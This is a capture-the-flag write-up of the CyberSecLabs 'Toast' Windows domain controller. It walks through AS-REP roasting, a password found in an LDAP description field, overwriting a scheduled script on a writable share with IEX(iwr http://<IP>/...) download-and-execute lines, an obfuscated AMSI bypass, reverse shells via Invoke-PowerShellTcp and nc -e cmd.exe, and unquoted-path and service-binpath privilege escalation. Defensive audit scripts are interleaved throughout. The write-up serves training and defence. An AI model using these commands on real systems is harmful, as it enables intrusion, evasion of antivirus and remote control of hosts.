• @Firestone65

1# CRTP Series | CyberSecLabs : Toast Write-up

Updated: Nov 10, 2021



This is the 1st blog out of a series of blogs I will be publishing on vulnerable machines in preparation for the CRTP exam.

You can access my Gitbook repository here for all the commands.


Let's begin!


Reconnaissance


First we run an nmap scan to see which ports are open and the services running on them.

  • -Pn : Skip host discovery [Don't ping]

  • -p- : Scan all 65535 ports

  • -oA : Save output to file


Let's run an aggressive nmap scan to enumerate the services on all open ports.

  • -A : Enable OS detection, version detection, script scanning, and traceroute


Notes:

  • Looking at ports 389 (LDAP) and 88 (Kerberos), our target is likely a Domain Controller.

  • Domain Name : Toast.csl | Hostname: TOAST-DC

  • The SMB service stands out from all the services, and that's where we'll start poking.


Enumeration


We have anonymous read access on 2 shares, but nothing useful in there.

Interestingly, we now have 2 usernames:

  • Karen

  • Potato

If we did not know this, we could enumerate valid users using GetNPUsers.py from impacket with a username wordlist from SecLists.


Let's see if any of the users have Kerberos-Pre-authentication disabled. If yes, we could grab the user's crackable AS-REP and brute-force it offline.


Let's take a deeper look at how this attack works.


 

ASREP Roast

  • If a user's UserAccountControl settings have "Do not require Kerberos preauthentication" enabled, i.e. Kerberos preauth is disabled, it is possible to grab the user's crackable AS-REP and brute-force it offline.

  • With sufficient rights (GenericWrite or GenericAll), Kerberos preauth can be forcibly disabled as well.

Workflow

  1. [AS-REQ] A timestamp is encrypted with the NTLM hash of the user and sent to the KDC. This is what happens when pre-auth is enabled, so the KDC knows that the request came from that specific user. If pre-auth is disabled, this step can be spoofed.

  2. [AS-REP] The KDC creates a TGT, which is encrypted. The reply contains additional information which is signed with the user's NTLM hash.

  3. The attacker grabs the AS-REP and cracks the user's NTLM hash offline.

 

Using GetNPUsers.py from impacket we were able to identify that user 'Karen' has Kerberos Preauth disabled. The AS-REP is stored in a format readable by john. Crack the NTLM hash with rockyou.txt as the wordlist.

Great, we've owned user Karen!


Remember that LDAP (port 389) was open. Let's manually enumerate LDAP as user Karen.

First we need to identify the naming context. Let's use python3.

Next, let's grab the "Description" for all objects. Why, you ask? Administrators are known to save passwords in the "Description" of the object, especially when there are roles requiring double-shifts where different users share passwords. They are obviously unaware that these fields can be read by bad actors.
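Both weaknesses met so far, the account with pre-authentication disabled (the ASREP Roast section above) and the password left in a "Description", can be found from the defender's side with one audit of an LDAP export. The Python below is an added example, not code from this write-up; it parses a constructed LDIF sample (the accounts alice, bob and carol are made up) and flags both. On a live directory the first check corresponds to the LDAP filter (userAccountControl:1.2.840.113556.1.4.803:=4194304).

```python
import base64, re

DONT_REQ_PREAUTH = 0x400000  # UAC bit for "Do not require Kerberos preauthentication"
# Heuristic for "password: X" style notes; tune it to your environment.
SECRET_HINT = re.compile(r"\b(pass(word|wd)?|pwd|pw)\b\s*(is\b|[:=])\s*\S+", re.I)
# Constructed sample export; names and values are not taken from the lab.
_B64 = base64.b64encode(b"Night shift password: Example-Only-123").decode()
SAMPLE_LDIF = f"""\
dn: CN=alice,CN=Users,DC=example,DC=test
sAMAccountName: alice
userAccountControl: 4260352
description: Helpdesk analyst

dn: CN=bob,CN=Users,DC=example,DC=test
sAMAccountName: bob
userAccountControl: 512
description:: {_B64}

dn: CN=carol,CN=Users,DC=example,DC=test
sAMAccountName: carol
userAccountControl: 66048
description: Finance team lead, shared mail
 box owner
"""

def parse_ldif(text):
    """Yield a dict per entry, undoing line folding and base64 ('attr:: ') values."""
    unfolded = re.sub(r"\r?\n ", "", text)  # a leading space continues the previous line
    for block in re.split(r"\n\s*\n", unfolded.strip()):
        entry = {}
        for line in block.splitlines():
            m = re.match(r"([\w;-]+)(::?) ?(.*)", line)
            if m:
                value = m.group(3)
                if m.group(2) == "::":
                    value = base64.b64decode(value).decode("utf-8", "replace")
                entry.setdefault(m.group(1).lower(), []).append(value)
        yield entry

def audit(text):
    """Return (account, finding) pairs for the two weaknesses described above."""
    findings = []
    for e in parse_ldif(text):
        who = e.get("samaccountname", ["?"])[0]
        if int(e.get("useraccountcontrol", ["0"])[0]) & DONT_REQ_PREAUTH:
            findings.append((who, "preauth-not-required"))
        if any(SECRET_HINT.search(d) for d in e.get("description", [])):
            findings.append((who, "credential-like-description"))
    return findings
```

The base64 case matters: directory tools export values with non-ASCII or leading-space content as `description:: ...`, so a plain text search of the export would miss them.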


Looks like we've got user Potato's credentials! Let's revisit enumeration of shares with Potato's privileges.

Notes:

  • We have READ/WRITE access on Potato share.

  • ClearLogs.ps1 appears to be running as a cronjob every minute.

  • We could possibly replace its contents to grab a reverse shell onto the target.


Initial Foothold



Notes:

  • The traditional methods of gaining a foothold, using Invoke-PowerShellTcp.ps1 or delivering the payload over SMB, do not work. Although we can observe the target's requests to our web server, we do not get a shell, as Defender and AMSI seem to be causing problems.

  • To overcome this, let's use this AMSI bypass. Shout-out to PinkDraconian for this.

  • Additionally we'll need to obfuscate the bypass code using ISESteroids.

Obfuscation of AMSI Bypass


1. To install ISESteroids, run this in PowerShell:

Install-Module -Name "ISESteroids" -Scope CurrentUser -Repository PSGallery -Force

2. Start a PowerShell ISE editor and run:

Start-Steroids

3. Copy the AMSI Bypass code to the editor and obfuscate the code.

4. Save the output as amsibypass.ps1



Download Invoke-PowerShellTcp.ps1 and append to its end:

Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <Port No>

Copy both scripts to a folder and host it on a web server.

python -m SimpleHTTPServer

Let's replace ClearLogs.ps1 with the below content:

IEX(iwr http://<IP>/amsibypass.ps1 -UseBasicParsing); 
IEX(iwr http://<IP>/Invoke-PowerShellTcp.ps1 -UseBasicParsing);

Copy it to the Potato Share by logging into SMB:

smbclient \\\\172.31.3.8\\Potato -U "Potato"%"W2CUvphqXB"
put ClearLogs.ps1

The idea is to get the cronjob to download both scripts and execute in memory. Soon enough, we get a callback, followed by a reverse shell!


To get a more stable shell, I downloaded netcat onto the target to create a new shell.

We've got our first flag!



Lateral Movement


To automate the Local Windows Privilege Escalation checklist, download & execute winPEAS on the target. Right away we observe a red flag: there is a misconfigured service, 'HellEscape', with an Unquoted Service Path. We check whether we have permissions to restart 'HellEscape' using the Service Controller utility (sc), and sure enough we do!

Let's take a deeper look at how this local privilege escalation attack works:


 

Unquoted Service Path Abuse


Services in Windows have a binpath (binary path), which contains the command the service runs when it starts. If we use the sc utility to display the config of a service, we see the BINARY_PATH_NAME among other information.

Weird stuff can happen if we do not use quotes in the BINARY_PATH_NAME.


Executables can take arguments, generally separated by spaces, and executables can be referenced by their absolute paths. Paths can also have spaces in them. Let's understand how Windows interprets unquoted service paths:

Prerequisites:

  • Services that have a space in their path with no quotes.

  • Write permissions in the required folder.

Target a service which:

  • We have permissions to restart.

  • Runs with elevated privileges.

In this case, when 'HellEscape' is started, the system tries to interpret the possibilities in the following order:

  1. c:\Program.exe

  2. c:\Program Files\Purgatory\Up.exe

  3. c:\Program Files\Purgatory\Up For.exe and so on.

If an attacker is able to place a malicious executable in one of these unexpected paths, he can elevate privileges to the user running the service.
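An added example (not from the original write-up) that turns the search order above into an audit: for each service command line it lists the executables Windows would try before the intended one, the directories whose write ACLs need checking, and the quoted value that removes the ambiguity. The service names and paths in SERVICES are constructed, not the lab's.

```python
import ntpath
import re

def split_command(bin_path):
    """Split an unquoted BINARY_PATH_NAME into (intended executable, arguments)."""
    cmd = bin_path.strip()
    m = re.search(r"\.exe(?= |$)", cmd, re.IGNORECASE)
    end = m.end() if m else len(cmd)
    return cmd[:end], cmd[end:].strip()

def hijack_candidates(bin_path):
    """Executables Windows tries before the intended one; empty if not exposed."""
    if bin_path.strip().startswith('"'):
        return []  # quoted: the program name is unambiguous
    exe, _args = split_command(bin_path)
    # Every space inside the executable path is a point where parsing may stop.
    return [exe[:sp.start()] + ".exe" for sp in re.finditer(r" +", exe)]

def quoted_form(bin_path):
    """The corrected value to set as the service's binary path."""
    if bin_path.strip().startswith('"'):
        return bin_path.strip()
    exe, args = split_command(bin_path)
    return f'"{exe}" {args}'.strip()

def audit(services):
    """Map each exposed service to its fix and the directories whose ACLs to check."""
    report = {}
    for name, bin_path in services.items():
        cands = hijack_candidates(bin_path)
        if cands:
            dirs = sorted({ntpath.dirname(c) for c in cands}, key=len)
            report[name] = {"candidates": cands, "check_write_acl": dirs,
                            "fix": quoted_form(bin_path)}
    return report

# Constructed inventory (service names and paths are made up, not the lab's).
SERVICES = {
    "AcmeLogAgent": r"C:\Program Files\Acme Tools\Log Agent\agent.exe -run",
    "AcmeUpdater": r'"C:\Program Files\Acme Tools\Updater\upd.exe" /svc',
    "HostedSvc": r"C:\Windows\system32\svchost.exe -k netsvcs",
}

if __name__ == "__main__":
    for svc, info in audit(SERVICES).items():
        print(svc, info)
```

Only the first entry is reported: the second is quoted, and in the third the only spaces are in the arguments, which does not create extra candidates.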


 

Now that we've got that covered, let's generate a reverse shell payload, rename it to 'Up.exe' and place it in the writable directory: c:\Program Files\Purgatory\Up.exe


Like before, we will need to bypass AMSI using amsibypass.ps1 before running the malicious executable. To make things simple, I've compiled Clearlogs.ps1 into an exe using PS2-EXE.

#Clearlogs.ps1 
IEX(iwr http://<IP>/amsibypass.ps1 -UseBasicParsing); 
IEX(iwr http://<IP>/Invoke-PowerShellTcp.ps1 -UseBasicParsing);

Remember to make the necessary port number changes within Invoke-PowerShellTcp.ps1.

Notes:

  • 'HellEscape' runs with privileges of 'Serviceuser'.

  • We have write-permissions in the required directory as well as restart permissions to exploit the Unquoted Service Path misconfiguration.

  • Compile Clearlogs.ps1 into script.exe

  • Transfer it over to the writable directory as:

c:\Program Files\Purgatory\Up.exe

  • Set up a listener using netcat.

  • Start 'HellEscape' using sc.

As you can see above, I've used netcat again to get a more stable shell. We now have privileges of Serviceuser!



Privilege Escalation


Once again, I've used winPEAS to see what's in store for us as 'Serviceuser'.

We can see that the service 'UsoSvc' is affected by a security misconfiguration vulnerability. We have Full Access on its binary path and it runs as LocalSystem (admin privileges). What does this mean? Well, we can re-configure the BINARY_PATH_NAME to run any command or any binary of our choosing when 'UsoSvc' is started. Ideal for elevating privileges. For example:

  • Add our user to the Administrators group:

net localgroup administrators toast\Serviceuser /add

  • Get a reverse shell:

c:\<Directory>\nc.exe <IP> <port no:> -e c:\Windows\system32\cmd.exe

Let's use the reverse shell method to elevate privileges to SYSTEM. We can use sc to modify the binpath and restart the service.

The System Flag is ours.
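From the defender's side, this misconfiguration shows up in the service's security descriptor as a non-admin trustee holding SERVICE_CHANGE_CONFIG (or the right to rewrite the ACL). The Python below is an added example, not code from this write-up; it checks descriptors in the SDDL form printed by sc sdshow, and the three descriptors in it are constructed, since the lab's actual ACL is not shown here.

```python
import re

# SDDL right codes that let the holder take over a service, with their service meaning.
DANGEROUS = {"DC": "SERVICE_CHANGE_CONFIG", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
             "GA": "GENERIC_ALL", "GW": "GENERIC_WRITE"}
MASK_BITS = {0x2: "DC", 0x40000: "WD", 0x80000: "WO",
             0x10000000: "GA", 0x40000000: "GW"}
# Trustees expected to manage services: LocalSystem, Administrators, Domain Admins.
TRUSTED = {"SY", "BA", "DA"}

def risky_aces(sddl):
    """Return (trustee, [rights]) for DACL allow-ACEs that permit reconfiguring the service."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)  # DACL only, the SACL is ignored
    findings = []
    for ace in re.findall(r"\(([^)]*)\)", m.group(1) if m else ""):
        fields = ace.split(";")
        if len(fields) < 6:
            continue  # malformed ACE
        ace_type, rights, trustee = fields[0], fields[2], fields[5]
        if ace_type != "A" or trustee in TRUSTED:
            continue
        if rights.lower().startswith("0x"):  # rights given as a hex access mask
            mask = int(rights, 16)
            codes = [c for bit, c in MASK_BITS.items() if mask & bit]
        else:  # rights given as concatenated two-letter codes
            codes = [c for c in re.findall("..", rights) if c in DANGEROUS]
        if codes:
            findings.append((trustee, [DANGEROUS[c] for c in codes]))
    return findings

# Constructed descriptors in the format `sc sdshow <service>` prints (not the lab's).
WEAK = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
        "(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
WEAK_HEX = "D:(A;;0xf01ff;;;IU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
HARDENED = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
            "(A;;CCLCSWLOCRRC;;;AU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")

if __name__ == "__main__":
    for label, sd in (("weak", WEAK), ("weak-hex", WEAK_HEX), ("hardened", HARDENED)):
        print(label, risky_aces(sd))
```

In WEAK the only difference from HARDENED is the DC code granted to Authenticated Users (AU), which is enough to let any domain user change the service's binary path.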



To Summarize:

  • Valid usernames were enumerated.

  • User Karen had Kerberos-Pre-authentication disabled and a weak password configured. This enabled us to grab the AS-REP and crack the hash offline.

  • User Potato's password was exposed in the object 'Description'.

  • The service 'HellEscape' was misconfigured with an Unquoted Service Path, which helped us move laterally and obtain Serviceuser's privileges.

  • The service 'UsoSvc' had misconfigured permissions which helped us elevate to LocalSystem.


 
